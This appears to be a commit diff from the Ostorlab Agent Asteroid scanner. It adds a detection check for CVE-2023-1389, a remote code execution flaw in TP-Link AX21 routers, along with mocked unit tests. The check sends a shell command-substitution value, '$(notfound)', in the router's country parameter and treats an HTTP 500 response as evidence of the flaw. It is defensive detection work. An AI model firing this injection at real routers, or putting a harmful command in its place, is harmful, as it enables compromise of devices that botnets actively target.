Ostorlab · 3asm · Nov 28, 2023 · Nov 27, 2023 · Nov 27, 2023 · Nov 27, 2023
@@ -13,6 +13,10 @@ class Target:
     port: int
     path: str = "/"
 
+    @property
+    def url(self) -> str:
+        return f"{self.scheme}://{self.host}:{self.port}{self.path}"
+
 
 @dataclasses.dataclass
 class Vulnerability:

@@ -0,0 +1,88 @@
+"""Agent Asteroid implementation for CVE-2023-1389"""
+
+import requests
+from ostorlab.agent.kb import kb
+from ostorlab.agent.mixins import agent_report_vulnerability_mixin
+from requests import exceptions as requests_exceptions
+
+from agent import definitions
+from agent import exploits_registry
+
+VULNERABILITY_TITLE = "Remote Code Execution in TP-Link AX21"
+VULNERABILITY_REFERENCE = "CVE-2023-1389"
+VULNERABILITY_DESCRIPTION = (
+    "TP-Link AX21 suffers from Remote Code Execution (RCE) vulnerability. The vulnerability"
+    " has been added to the Mirai botnet Arsenal and is actively being targeted by threat actors"
+    " in the wild."
+)
+
+
+DEFAULT_TIMEOUT = 90
+
+
+@exploits_registry.register
+class CVE20231389Exploit(definitions.Exploit):
+    """CVE-2023-1389: Remote Code Execution in TP-Link AX21."""
+
+    def accept(self, target: definitions.Target) -> bool:
+        target_uri = f"{target.scheme}://{target.host}:{target.port}/cgi-bin/luci/"
+        try:
+            response = requests.get(target_uri, verify=False, timeout=DEFAULT_TIMEOUT)
+            return response.status_code == 200
+        except requests_exceptions.RequestException:
+            return False
+
+    def check(self, target: definitions.Target) -> list[definitions.Vulnerability]:
+        target_uri = f"{target.scheme}://{target.host}:{target.port}"
+        try:
+            response = requests.get(
+                target_uri
+                + "/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(notfound)",
+                verify=False,
+                timeout=DEFAULT_TIMEOUT,
+            )
+            # TODO(OS-6117): Approximate check that needs a live instance to validate the issue.
+            if response.status_code == 500:
+                vulnerability = self._generate_vulnerability_object(target_uri)
+                return [vulnerability]
+
+        except requests_exceptions.RequestException:
+            return []
+
+        return []
+
+    def _generate_vulnerability_object(
+        self, target_uri: str
+    ) -> definitions.Vulnerability:
+        entry = kb.Entry(
+            title=VULNERABILITY_TITLE,
+            risk_rating="CRITICAL",
+            short_description=VULNERABILITY_DESCRIPTION,
+            description=VULNERABILITY_DESCRIPTION,
+            references={
+                "nvd.nist.gov": f"https://nvd.nist.gov/vuln/detail/{VULNERABILITY_REFERENCE}",
+                "TP-Link Advisory": "https://www.tp-link.com/us/support/faq/3643/",
+                "Exploit Write-Up": "https://voyag3r-security.medium.com/exploring-cve-2023-1389"
+                "-rce-in-tp-link-archer-ax21-d7a60f259e94",
+            },
+            recommendation=(
+                "- Make sure to install the latest security patches from software vendor \n"
+                "- Update to the latest software version"
+            ),
+            security_issue=True,
+            privacy_issue=False,
+            has_public_exploit=True,
+            targeted_by_malware=True,
+            targeted_by_ransomware=True,
+            targeted_by_nation_state=True,
+        )
+        technical_detail = (
+            f"{target_uri} is vulnerable to {VULNERABILITY_REFERENCE},"
+            f" {VULNERABILITY_TITLE}."
+        )
+        vulnerability = definitions.Vulnerability(
+            entry=entry,
+            technical_detail=technical_detail,
+            risk_rating=agent_report_vulnerability_mixin.RiskRating.CRITICAL,
+        )
+        return vulnerability
@@ -0,0 +1,61 @@
+"""Unit tests for Agent Asteriod: CVE-2023-1389"""
+
+import requests_mock as req_mock
+
+
+from agent import definitions
+from agent.exploits import cve_2023_1389
+
+
+def testCVE20231389_whenVulnerable_reportFinding(
+    requests_mock: req_mock.mocker.Mocker,
+) -> None:
+    """Test exploit report finding when 500 error is triggered."""
+    target = definitions.Target("https", "109.239.246.106", 10443)
+    requests_mock.get(
+        target.url + "cgi-bin/luci/",
+        status_code=200,
+    )
+    requests_mock.get(
+        target.url
+        + "cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(notfound)",
+        status_code=500,
+    )
+
+    exploit_instance = cve_2023_1389.CVE20231389Exploit()
+    accept = exploit_instance.accept(target)
+    vulnerabilities = exploit_instance.check(target)
+
+    assert accept is True
+    assert len(vulnerabilities) > 0
+    vulnerability = vulnerabilities[0]
+
+    assert vulnerability.entry.title == "Remote Code Execution in TP-Link AX21"
+    assert (
+        vulnerability.technical_detail
+        == "https://109.239.246.106:10443 is vulnerable to CVE-2023-1389, Remote Code Execution in TP-Link AX21."
+    )
+    assert vulnerability.entry.risk_rating == "CRITICAL"
+
+
+def testCVE20231389_whenNotVulnerable_reportNoFinding(
+    requests_mock: req_mock.mocker.Mocker,
+) -> None:
+    """Test exploit don't report finding on 404 pages."""
+    target = definitions.Target("https", "109.239.246.106", 10443)
+    requests_mock.get(
+        target.url + "cgi-bin/luci/",
+        status_code=404,
+    )
+    requests_mock.get(
+        target.url
+        + "cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(notfound)",
+        status_code=404,
+    )
+
+    exploit_instance = cve_2023_1389.CVE20231389Exploit()
+    accept = exploit_instance.accept(target)
+    vulnerabilities = exploit_instance.check(target)
+
+    assert accept is False
+    assert len(vulnerabilities) == 0